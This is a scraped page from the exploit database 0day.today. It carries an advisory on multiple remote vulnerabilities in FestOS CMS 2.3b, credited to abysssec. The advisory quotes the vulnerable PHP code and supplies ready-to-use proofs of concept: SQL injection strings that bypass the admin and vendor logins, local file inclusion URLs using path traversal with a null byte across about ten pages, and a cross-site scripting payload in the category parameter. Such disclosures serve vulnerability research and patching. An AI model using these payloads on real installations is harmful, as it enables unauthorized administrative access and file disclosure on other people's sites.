0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FestOS CMS 2.3b Multiple Remote Vulnerabilities
=============================================== FestOS CMS 2.3b Multiple Remote Vulnerabilities =============================================== Title : FestOS CMS 2.3b Multiple Remote Vulnerabilities Affected Version : <=2.3b Vendor Site : http://festengine.org/ Discovery : abysssec.com Description : This CMS have many critical vulnerability that we refere to some of those here: Vulnerabilites : 1- SQL Injection Vulnerability : 1.1- in admin/do_login.php line 17: // Process the login $query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'"; $res = $festos->query($query); poc: in admin.php page: username: admin' or '1'='1 password: admin' or '1'='1 1.2- in festos_z_dologin.php: $query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'"; poc: in applications.php page: email: anything pass: a' or 1=1/* 2- Local File Inclusion (lfi): Vulnerability in index.php: line 41: if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) { ... require_once($themepath.'/includes/header.php'); poc: http://localhost/festos/index.php?theme=../admin/css/admin.css%00 http://localhost/festos/artists.php?theme=../admin/css/admin.css%00 http://localhost/festos/contacts.php?theme=../admin/css/admin.css%00 http://localhost/festos/applications.php?theme=../admin/css/admin.css%00 http://localhost/festos/entertainers.php?theme=../admin/css/admin.css%00 http://localhost/festos/exhibitors.php?theme=../admin/css/admin.css%00 http://localhost/festos/foodvendors.php?theme=../admin/css/admin.css%00 http://localhost/festos/performanceschedule.php?theme=../admin/css/admin.css%00 http://localhost/festos/sponsors.php?theme=../admin/css/admin.css%00 http://localhost/festos/winners.php?theme=../admin/css/admin.css%00 3- Cross Site Scripting: in foodvendors.php, festos_foodvendors.php page has been included. lines 31-36. switch($switcher) { case 'details': if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') { $template = 'foodvendors_nonespecified.tpl'; break; } and in line 74: $tpl->set('vType', $_GET['category']); and foodvendors_nonespecified.tpl line 123: <p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p> the category parameter is vulnerable to xss: poc: http://localhost/festos/foodvendors.php?view=details&vendorID=4&category=%3Ciframe%20src=javascript:alert%28%22XSS%22%29;&vTypeID=28 # 0day.today [2024-07-05] #